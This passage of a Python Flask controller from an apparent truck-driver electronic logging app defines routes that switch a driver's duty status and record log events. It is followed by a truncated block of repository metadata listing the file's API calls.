99.9.\n    # Data Length : 3-7 characters.\n    # Data Format : <Vehicle Miles> as in <C.C> to <CCCCC.C>.\n    # Disposition : Mandatory.\n    # Examples : [0.0], [9.9], [346.1], [2891.4]. 
\n\n\n # Event_Latitude = Column(Float)\n # Event_Longitude = Column(Float)\n # Distance_Since_Last_Valid_Coordinates = Column(Integer)\n # Malfunction_Indicator_Status = Column(Integer)\n # # Description : A code that further specifies the underlying malfunction or data\n # # diagnostic event.\n # # Purpose : Enables coding the type of malfunction and data diagnostic event to\n # # cover the standardized set in Table 4 of this appendix.\n # # Source : ELD internal monitoring.\n # # Used in : ELD events; ELD outputs.\n # # Data Type : Recorded by ELD when malfunctions and data diagnostic events are set\n # # or reset. \n # # 157\n # # Data Range : As specified in Table 4 of this appendix.\n # # Data Length : 1 character.\n # # Data Format : <C>.\n # # Disposition _ : Mandatory.\n # # Examples : [1], [5], [P], [L]. \n \n # Data_Diagnostic_Event_Indicator_Status = Column(Integer)\n # Event_Comment = Column(Char)\n # Drivers_Location_Description = Column(Char)\n # Event_Data_Check_Value = Column(Integer)\n #Type 2(b) \n\n\n@logs_blueprint.route('/ONDUTY', methods=['GET'])\ndef onduty():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n print(\"on duty\")\n try:\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [2, current_user.get_id()])\n db.session.commit()\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 1, Event_Code = 4, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(),user_id = current_user.get_id() , todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit()\n\n\n except Exception as e:\n print(e)\n return jsonify(result=\"On Duty\")\n\n\n@logs_blueprint.route('/SLEEPING', methods=['GET'])\ndef sleeping():\n \"\"\"Add two numbers server side, ridiculous but well...\"\"\"\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [3, current_user.get_id()])\n db.session.commit()\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 1, Event_Code = 2, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), device_id = driver_id, todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n\n except Exception as e:\n print(e)\n print(\"Sleep\")\n return jsonify(result=\"Sleeping\")\n\n\n@logs_blueprint.route('/OFFDUTY', methods=['GET'])\ndef offduty():\n \"\"\"Add two numbers server side, ridiculous but well...\"\"\"\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n db.engine.execute('update 
drivers set \"Current_Status\" = %s where user_id = %s', [4, current_user.get_id()])\n db.session.commit()\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 1, Event_Code = 1, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), device_id = driver_id, todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n except Exception as e:\n print(e)\n print(\"off duty\")\n return jsonify(result=\"Off Duty\")\n\n\n@logs_blueprint.route('/authorized', methods=['GET'])\ndef authorized():\n \"\"\"Add two numbers server side, ridiculous but well...\"\"\"\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [4, current_user.get_id()])\n db.session.commit()\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 3, Event_Code = 1, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), device_id = driver_id, todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n except Exception as e:\n print(e)\n return jsonify(result=\"Authorized Personal Use of CMV\")\n\n\n@logs_blueprint.route('/yard', methods=['GET'])\ndef yard():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 3, Event_Code = 2, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id())\n db.session.add(event)\n db.session.commit() \n except Exception as e:\n print(e)\n print(\"off duty\")\n return jsonify(result=\"Yard Moves\")\n\n\n@logs_blueprint.route('/cleared', methods=['GET'])\ndef cleared():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + 
str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 3, Event_Code = 0, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n except Exception as e:\n print(e)\n print(\"off duty\")\n return jsonify(result=\"Indication for PC, YM, and WT Cleared\")", "repo_name": "SteelCode23/Python-REST-API", "sub_path": "webapp1/controllers/logs.py", "file_name": "logs.py", "file_ext": "py", "file_size_in_byte": 25852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 12, "usage_type": "call"}, {"api_name": "webapp1.forms.CertifyForm", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 37, "usage_type": "call"}, {"api_name": "webapp1.forms.CertifyForm", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 45, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 45, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 45, "usage_type": "name"}, {"api_name": "webapp1.models.Events", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 57, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 58, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 58, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 58, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 59, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 59, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "webapp1.forms.ElogForm", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "webapp1.forms.DriverForm", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 69, "usage_type": 
"call"}, {"api_name": "flask.request.form", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 70, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 70, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 71, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 71, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "webapp1.models.drivers", "line_number": 73, "usage_type": "call"}, {"api_name": "webapp1.models.db.session.add", "line_number": 74, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 74, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 74, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.rollback", "line_number": 77, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 77, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.is_authenticated", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 97, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 97, "usage_type": "name"}, {"api_name": "webapp1.forms.ElogForm", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 99, "usage_type": "name"}, {"api_name": "webapp1.forms.DriverForm", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 102, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 102, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 110, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 111, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 111, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 113, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 114, "usage_type": 
"attribute"}, {"api_name": "webapp1.models.Events.query.filter_by", "line_number": 120, "usage_type": "call"}, {"api_name": "webapp1.models.Events.query", "line_number": 120, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 120, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.is_authenticated", "line_number": 140, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user", "line_number": 140, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 143, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 162, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 165, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 165, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 165, "usage_type": "name"}, {"api_name": "webapp1.forms.ElogForm", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "webapp1.forms.DriverForm", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 167, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 178, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 178, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 180, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 180, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events.query.filter_by", "line_number": 186, "usage_type": "call"}, {"api_name": "webapp1.models.Events.query", "line_number": 186, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 209, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 209, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 209, "usage_type": "name"}, {"api_name": "webapp1.models.Events.query.filter_by", "line_number": 212, "usage_type": "call"}, {"api_name": "webapp1.models.Events.query", "line_number": 212, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 212, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 218, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 218, "usage_type": "name"}, {"api_name": "webapp1.forms.ElogForm", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 219, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 219, "usage_type": "name"}, {"api_name": "webapp1.forms.DriverForm", "line_number": 220, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 220, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 220, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "webapp1.models.Events.query.filter_by", "line_number": 230, "usage_type": "call"}, {"api_name": "webapp1.models.Events.query", "line_number": 230, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 230, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 245, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 281, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 281, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 281, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 282, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 282, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 282, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 284, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 284, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 285, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 285, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 287, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 287, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 288, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 288, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 289, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 289, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 289, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 289, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 289, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 290, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 290, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 290, "usage_type": "name"}, {"api_name": "webapp1.models.Events", "line_number": 291, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 291, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 291, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.session.add", "line_number": 292, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 292, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 292, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 293, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 293, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", 
"line_number": 293, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 455, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 455, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 455, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 456, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 456, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 456, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 459, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 459, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 459, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 459, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 459, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 462, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 462, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 463, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 463, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 465, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 465, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 466, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 466, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 467, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 467, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 467, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 467, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 467, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 468, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 468, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 468, "usage_type": "name"}, {"api_name": "webapp1.models.Events", "line_number": 469, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 469, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 469, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 469, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 469, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 470, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 470, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 470, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 471, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 471, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 471, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 476, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 482, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 482, 
"usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 482, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 483, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 483, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 483, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 485, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 485, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 485, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 485, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 485, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 486, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 486, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 486, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 487, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 487, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 487, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 487, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 487, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 490, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 490, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 491, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 491, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 493, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 493, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 494, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 494, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 495, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 495, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 495, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 495, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 495, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 496, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 496, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 496, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 497, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 497, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 497, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 502, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 508, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 508, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 508, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 509, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 509, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 509, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 511, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 511, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 511, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 511, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 511, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 512, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 512, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 512, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 513, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 513, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 513, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 513, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 513, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 516, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 516, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 517, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 517, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 519, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 519, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 520, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 520, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 521, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 521, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 521, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 521, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 521, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 522, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 522, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 522, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 523, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 523, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 523, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 527, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 533, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 533, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 533, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 534, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 534, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 534, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 536, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 536, "usage_type": 
"attribute"}, {"api_name": "webapp1.models.db", "line_number": 536, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 536, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 536, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 539, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 539, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 540, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 540, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 542, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 542, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 543, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 543, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 544, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 544, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 544, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 544, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 544, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 545, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 545, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 545, "usage_type": "name"}, {"api_name": "webapp1.models.Events", 